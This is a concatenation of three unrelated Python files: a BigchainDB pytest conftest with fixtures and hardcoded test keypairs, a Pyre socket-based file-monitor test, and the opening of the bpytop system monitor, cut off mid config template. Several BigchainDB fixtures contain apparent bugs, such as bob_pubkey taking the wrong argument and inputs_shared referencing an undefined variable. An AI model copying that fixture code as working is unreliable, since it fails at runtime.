USER_PUBLIC_KEY = 'JEAkEJqLbbgDRAtMm8YAjGp759Aq2qTn9eaEHUj2XePE'
def pytest_runtest_setup(item):
if isinstance(item, item.Function):
backend = item.session.config.getoption('--database-backend')
if (item.get_marker('localmongodb') and backend != 'localmongodb'):
pytest.skip('Skip tendermint specific tests if not using localmongodb')
def pytest_addoption(parser):
from bigchaindb.backend.connection import BACKENDS
backends = ', '.join(BACKENDS.keys())
parser.addoption(
'--database-backend',
action='store',
default=os.environ.get('BIGCHAINDB_DATABASE_BACKEND', 'localmongodb'),
help='Defines the backend to use (available: {})'.format(backends),
)
def pytest_ignore_collect(path, config):
from bigchaindb.backend.connection import BACKENDS
path = str(path)
supported_backends = BACKENDS.keys()
if os.path.isdir(path):
dirname = os.path.split(path)[1]
if dirname in supported_backends and dirname != config.getoption('--database-backend'):
print('Ignoring unrequested backend test dir: ', path)
return True
def pytest_configure(config):
config.addinivalue_line(
'markers',
'bdb(): Mark the test as needing BigchainDB.'
'BigchainDB will be configured such that the database and tables are available for an '
'entire test session.'
'You need to run a backend (e.g. MongoDB) '
'prior to running tests with this marker. You should not need to restart the backend '
'in between tests runs since the test infrastructure flushes the backend upon session end.'
)
config.addinivalue_line(
'markers',
'abci(): Mark the test as needing a running ABCI server in place. Use this marker'
'for tests that require a running Tendermint instance. Note that the test infrastructure'
'has no way to reset Tendermint data upon session end - you need to do it manually.'
'Setup performed by this marker includes the steps performed by the bdb marker.'
)
@pytest.fixture(autouse=True)
def _bdb_marker(request):
if request.keywords.get('bdb', None):
request.getfixturevalue('_bdb')
@pytest.fixture(autouse=True)
def _restore_config(_configure_bigchaindb):
from bigchaindb import config, config_utils
config_before_test = copy.deepcopy(config)
yield
config_utils.set_config(config_before_test)
@pytest.fixture(scope='session')
def _configure_bigchaindb(request):
import bigchaindb
from bigchaindb import config_utils
test_db_name = TEST_DB_NAME
# Put a suffix like _gw0, _gw1 etc on xdist processes
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
test_db_name = '{}_{}'.format(TEST_DB_NAME, xdist_suffix)
backend = request.config.getoption('--database-backend')
config = {
'database': bigchaindb._database_map[backend],
'keypair': {
'private': '31Lb1ZGKTyHnmVK3LUMrAUrPNfd4sE2YyBt3UA4A25aA',
'public': '4XYfCbabAWVUCbjTmRTFEu2sc3dFEdkse4r6X498B1s8',
}
}
config['database']['name'] = test_db_name
config = config_utils.env_config(config)
config_utils.set_config(config)
@pytest.fixture(scope='session')
def _setup_database(_configure_bigchaindb):
from bigchaindb import config
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
print('Initializing test db')
dbname = config['database']['name']
conn = connect()
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
schema.init_database(conn)
print('Finishing init database')
yield
print('Deleting `{}` database'.format(dbname))
conn = connect()
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
print('Finished deleting `{}`'.format(dbname))
@pytest.fixture
def _bdb(_setup_database, _configure_bigchaindb):
from bigchaindb import config
from bigchaindb.backend import connect
from .utils import flush_db
conn = connect()
yield
dbname = config['database']['name']
flush_db(conn, dbname)
# We need this function to avoid loading an existing
# conf file located in the home of the user running
# the tests. If it's too aggressive we can change it
# later.
@pytest.fixture
def ignore_local_config_file(monkeypatch):
def mock_file_config(filename=None):
return {}
monkeypatch.setattr('bigchaindb.config_utils.file_config',
mock_file_config)
@pytest.fixture
def reset_logging_config():
# root_logger_level = getLogger().level
root_logger_level = 'DEBUG'
dictConfig({'version': 1, 'root': {'level': 'NOTSET'}})
yield
getLogger().setLevel(root_logger_level)
@pytest.fixture
def user_sk():
return USER_PRIVATE_KEY
@pytest.fixture
def user_pk():
return USER_PUBLIC_KEY
@pytest.fixture
def user2_sk():
return USER2_SK
@pytest.fixture
def user2_pk():
return USER2_PK
@pytest.fixture
def alice():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def alice_privkey(alice):
return alice.private_key
@pytest.fixture
def alice_pubkey(alice):
return alice.public_key
@pytest.fixture
def bob():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def bob_privkey(bob):
return bob.private_key
@pytest.fixture
def bob_pubkey(carol):
return bob.public_key
@pytest.fixture
def carol():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def carol_privkey(carol):
return carol.private_key
@pytest.fixture
def carol_pubkey(carol):
return carol.public_key
@pytest.fixture
def merlin():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def merlin_privkey(merlin):
return merlin.private_key
@pytest.fixture
def merlin_pubkey(merlin):
return merlin.public_key
@pytest.fixture
def b():
from bigchaindb.tendermint import BigchainDB
return BigchainDB()
@pytest.fixture
def tb():
from bigchaindb.tendermint import BigchainDB
return BigchainDB()
@pytest.fixture
def create_tx(b, user_pk):
from bigchaindb.models import Transaction
name = f'I am created by the create_tx fixture. My random identifier is {random.random()}.'
return Transaction.create([b.me], [([user_pk], 1)], asset={'name': name})
@pytest.fixture
def signed_create_tx(b, create_tx):
return create_tx.sign([b.me_private])
@pytest.mark.abci
@pytest.fixture
def posted_create_tx(b, signed_create_tx):
res = b.post_transaction(signed_create_tx, 'broadcast_tx_commit')
assert res.status_code == 200
return signed_create_tx
@pytest.fixture
def signed_transfer_tx(signed_create_tx, user_pk, user_sk):
from bigchaindb.models import Transaction
inputs = signed_create_tx.to_inputs()
tx = Transaction.transfer(inputs, [([user_pk], 1)], asset_id=signed_create_tx.id)
return tx.sign([user_sk])
@pytest.fixture
def double_spend_tx(signed_create_tx, carol_pubkey, user_sk):
from bigchaindb.models import Transaction
inputs = signed_create_tx.to_inputs()
tx = Transaction.transfer(
inputs, [([carol_pubkey], 1)], asset_id=signed_create_tx.id)
return tx.sign([user_sk])
@pytest.fixture
def structurally_valid_vote():
return {
'node_pubkey': 'c' * 44,
'signature': 'd' * 86,
'vote': {
'voting_for_block': 'a' * 64,
'previous_block': 'b' * 64,
'is_block_valid': False,
'invalid_reason': None,
'timestamp': '1111111111'
}
}
def _get_height(b):
maybe_block = b.get_latest_block()
return 0 if maybe_block is None else maybe_block['height']
@pytest.fixture
def inputs(user_pk, b):
from bigchaindb.models import Transaction
# create blocks with transactions for `USER` to spend
for block in range(4):
transactions = [
Transaction.create(
[b.me],
[([user_pk], 1)],
metadata={'msg': random.random()},
).sign([b.me_private]).to_dict()
for _ in range(10)
]
block = Block(app_hash='', height=_get_height(b), transactions=transactions)
b.store_block(block._asdict())
@pytest.fixture
def inputs_shared(user_pk, user2_pk):
from bigchaindb.models import Transaction
# create blocks with transactions for `USER` to spend
for block in range(4):
transactions = [
Transaction.create(
[b.me],
[user_pk, user2_pk],
metadata={'msg': random.random()},
).sign([b.me_private]).to_dict()
for _ in range(10)
]
block = Block(app_hash='', height=_get_height(b), transaction=transactions)
b.store_block(block._asdict())
@pytest.fixture
def dummy_db(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import (DatabaseDoesNotExist,
DatabaseAlreadyExists)
conn = connect()
dbname = request.fixturename
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
dbname = '{}_{}'.format(dbname, xdist_suffix)
try:
schema.init_database(conn, dbname)
except DatabaseAlreadyExists:
schema.drop_database(conn, dbname)
schema.init_database(conn, dbname)
yield dbname
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
@pytest.fixture
def not_yet_created_db(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
conn = connect()
dbname = request.fixturename
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
dbname = '{}_{}'.format(dbname, xdist_suffix)
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
yield dbname
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
@pytest.fixture
def db_config():
from bigchaindb import config
return config['database']
@pytest.fixture
def db_host(db_config):
return db_config['host']
@pytest.fixture
def db_port(db_config):
return db_config['port']
@pytest.fixture
def db_name(db_config):
return db_config['name']
@pytest.fixture
def db_conn():
from bigchaindb.backend import connect
return connect()
@pytest.fixture
def db_context(db_config, db_host, db_port, db_name, db_conn):
DBContext = namedtuple(
'DBContext', ('config', 'host', 'port', 'name', 'conn'))
return DBContext(
config=db_config,
host=db_host,
port=db_port,
name=db_name,
conn=db_conn,
)
@pytest.fixture
def tendermint_host():
return os.getenv('BIGCHAINDB_TENDERMINT_HOST', 'localhost')
@pytest.fixture
def tendermint_port():
return int(os.getenv('BIGCHAINDB_TENDERMINT_PORT', 46657))
@pytest.fixture
def tendermint_ws_url(tendermint_host, tendermint_port):
return 'ws://{}:{}/websocket'.format(tendermint_host, tendermint_port)
@pytest.fixture
def tendermint_context(tendermint_host, tendermint_port, tendermint_ws_url):
TendermintContext = namedtuple(
'TendermintContext', ('host', 'port', 'ws_url'))
return TendermintContext(
host=tendermint_host,
port=tendermint_port,
ws_url=tendermint_ws_url,
)
@pytest.fixture
def mocked_setup_pub_logger(mocker):
return mocker.patch(
'bigchaindb.log.setup.setup_pub_logger', autospec=True, spec_set=True)
@pytest.fixture
def mocked_setup_sub_logger(mocker):
return mocker.patch(
'bigchaindb.log.setup.setup_sub_logger', autospec=True, spec_set=True)
@pytest.fixture(autouse=True)
def _abci_http(request):
if request.keywords.get('abci', None):
request.getfixturevalue('abci_http')
@pytest.fixture
def abci_http(_setup_database, _configure_bigchaindb, abci_server,
tendermint_host, tendermint_port):
import requests
import time
for i in range(300):
try:
uri = 'http://{}:{}/abci_info'.format(tendermint_host, tendermint_port)
requests.get(uri)
return True
except requests.exceptions.RequestException as e:
pass
time.sleep(1)
return False
@pytest.yield_fixture(scope='session')
def event_loop(request):
import asyncio
loop = asyncio.get_event_loop_policy().new_event_loop()
yield loop
loop.close()
@pytest.mark.bdb
@pytest.fixture(scope='session')
def abci_server():
from abci import ABCIServer
from bigchaindb.tendermint.core import App
from bigchaindb.utils import Process
app = ABCIServer(app=App())
abci_proxy = Process(name='ABCI', target=app.run)
yield abci_proxy.start()
abci_proxy.terminate()
@pytest.fixture
def wsserver_config():
from bigchaindb import config
return config['wsserver']
@pytest.fixture
def wsserver_scheme(wsserver_config):
return wsserver_config['advertised_scheme']
@pytest.fixture
def wsserver_host(wsserver_config):
return wsserver_config['advertised_host']
@pytest.fixture
def wsserver_port(wsserver_config):
return wsserver_config['advertised_port']
@pytest.fixture
def wsserver_base_url(wsserver_scheme, wsserver_host, wsserver_port):
return '{}://{}:{}'.format(wsserver_scheme, wsserver_host, wsserver_port)
@pytest.fixture
def unspent_output_0():
return {
'amount': 1,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 0,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d'
}
@pytest.fixture
def unspent_output_1():
return {
'amount': 2,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 1,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
}
@pytest.fixture
def unspent_output_2():
return {
'amount': 3,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 2,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
}
@pytest.fixture
def unspent_outputs(unspent_output_0, unspent_output_1, unspent_output_2):
return unspent_output_0, unspent_output_1, unspent_output_2
@pytest.fixture
def mongo_client(db_context):
return MongoClient(host=db_context.host, port=db_context.port)
@pytest.fixture
def utxo_collection(db_context, mongo_client):
return mongo_client[db_context.name].utxos
@pytest.fixture
def dummy_unspent_outputs():
return [
{'transaction_id': 'a', 'output_index': 0},
{'transaction_id': 'a', 'output_index': 1},
{'transaction_id': 'b', 'output_index': 0},
]
@pytest.fixture
def utxoset(dummy_unspent_outputs, utxo_collection):
res = utxo_collection.insert_many(copy.deepcopy(dummy_unspent_outputs))
assert res.acknowledged
assert len(res.inserted_ids) == 3
return dummy_unspent_outputs, utxo_collection
|
project_files_monitor_test.py
|
# Copyright (c) 2019-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import language_server_protocol, project_files_monitor
from ..language_server_protocol import (
LanguageServerProtocolMessage,
read_message,
write_message,
)
from ..project_files_monitor import (
ProjectFilesMonitor,
ProjectFilesMonitorException,
SocketConnection,
)
class ProjectFilesMonitorTest(unittest.TestCase):
@patch.object(language_server_protocol, "perform_handshake")
@patch.object(ProjectFilesMonitor, "_connect_to_socket")
@patch.object(project_files_monitor, "find_root")
def test_subscriptions(self, find_root, _connect_to_socket, perform_handshake):
find_root.return_value = "/ROOT"
arguments = MagicMock()
configuration = MagicMock()
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = "/ROOT"
# no additional extensions
configuration.extensions = []
monitor = ProjectFilesMonitor(arguments, configuration, analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:3],
["allof", ["type", "f"], ["not", "empty"]],
)
self.assertCountEqual(
subscription.subscription["expression"][3],
["anyof", ["suffix", "py"], ["suffix", "pyi"]],
)
# additional extensions
configuration.extensions = ["thrift", "whl"]
monitor = ProjectFilesMonitor(arguments, configuration, analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:3],
["allof", ["type", "f"], ["not", "empty"]],
)
self.assertCountEqual(
subscription.subscription["expression"][3],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["suffix", "whl"],
],
)
# no watchman root -> terminate
find_root.return_value = None
self.assertRaises(
ProjectFilesMonitorException,
ProjectFilesMonitor,
arguments,
configuration,
analysis_directory,
)
def test_bad_socket(self):
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
self.assertRaises(
ProjectFilesMonitorException,
ProjectFilesMonitor._connect_to_socket,
bad_socket_path,
)
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path):
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
write_message(
outfile,
LanguageServerProtocolMessage(
method="handshake/server", parameters={"version": "123"}
),
)
response = read_message(infile)
if not response or response.method != "handshake/client":
errors.append("Client handshake malformed")
return
updated_message = read_message(infile)
if (
not updated_message
or updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
arguments = MagicMock()
configuration = MagicMock()
configuration.extensions = []
configuration.version_hash = "123"
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
analysis_directory.process_updated_files.side_effect = lambda files: [
file.replace("ROOT", "ANALYSIS") for file in files
]
# only create the monitor once the socket is open
with socket_created_lock:
monitor = ProjectFilesMonitor(
arguments, configuration, analysis_directory
)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(language_server_protocol, "perform_handshake")
@patch.object(ProjectFilesMonitor, "_watchman_client")
@patch.object(ProjectFilesMonitor, "_connect_to_socket")
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_files_cleaned_up(
self,
_find_watchman_path,
_connect_to_socket,
_watchman_client,
perform_handshake,
):
with tempfile.TemporaryDirectory() as root:
arguments = MagicMock()
configuration = MagicMock()
configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
monitor = ProjectFilesMonitor(arguments, configuration, analysis_directory)
monitor._alive = False # never enter watchman loop
monitor._run()
monitor_folder = os.path.join(root, ".pyre", "file_monitor")
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.lock"))
)
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.pid"))
)
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath):
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
"long_name" * 15, ".pyre", "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
ProjectFilesMonitor._connect_to_socket(socket_link)
server_thread.join()
|
bpytop.py
|
#!/usr/bin/env python3
# pylint: disable=not-callable, no-member
# indent = tab
# tab-size = 4
# Copyright 2020 Aristocratos (jakob@qvantnet.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, localtime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print("ERROR!")
print("\n".join(errors))
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.49"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-f" , "--full" ,action="store_true" ,help ="Start in full mode showing all boxes [default]")
args.add_argument("-p" , "--proc" ,action="store_true" ,help ="Start in minimal mode without memory and net boxes")
args.add_argument("-s" , "--stat" ,action="store_true" ,help ="Start in minimal mode without process box")
args.add_argument("-v" , "--version" ,action="store_true" ,help ="Show version info and exit")
args.add_argument("--debug" ,action="store_true" ,help ="Start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_MODE: str = ""
if stdargs.full:
ARG_MODE = "full"
elif stdargs.proc:
ARG_MODE = "proc"
elif stdargs.stat:
ARG_MODE = "stat"
DEBUG = stdargs.debug
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Set bpytop view mode, "full" for everything shown, "proc" for cpu stats and processes, "stat" for cpu, mem, disks and net stats shown.
view_mode=$view_mode
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors has been found
show_coretemp=$show_coretemp
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be last folder in path of a mountpoint, "root" replaces "/", separate multiple values with comma.
#* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=boot, home"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
